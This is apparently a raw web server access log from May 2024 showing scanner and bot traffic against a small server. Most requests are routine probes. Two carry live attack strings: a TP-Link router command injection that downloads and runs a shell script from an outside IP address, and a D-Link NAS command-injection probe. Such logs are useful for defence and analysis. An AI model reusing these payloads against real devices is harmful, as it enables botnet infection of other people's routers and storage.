157.245.47.62 - - [05/May/2024:06:16:56 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
157.245.47.62 - - [05/May/2024:06:16:57 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
157.245.47.62 - - [05/May/2024:06:16:59 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
157.245.47.62 - - [05/May/2024:06:17:15 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
157.245.47.62 - - [05/May/2024:06:17:26 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
87.121.69.52 - - [05/May/2024:06:21:26 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [05/May/2024:06:26:53 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [05/May/2024:06:30:00 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
165.227.111.8 - - [05/May/2024:06:30:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.111.8 - - [05/May/2024:06:30:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; Redmi Note 7 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
65.49.1.15 - - [05/May/2024:06:36:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
35.203.210.15 - - [05/May/2024:06:37:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
65.49.1.15 - - [05/May/2024:06:38:16 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
65.49.1.22 - - [05/May/2024:06:38:50 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
141.255.167.250 - - [05/May/2024:06:40:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
87.121.69.52 - - [05/May/2024:06:41:06 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
103.245.236.120 - - [05/May/2024:06:41:49 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
103.245.236.120 - - [05/May/2024:06:43:08 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
193.233.161.134 - - [05/May/2024:06:44:39 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/120.0"
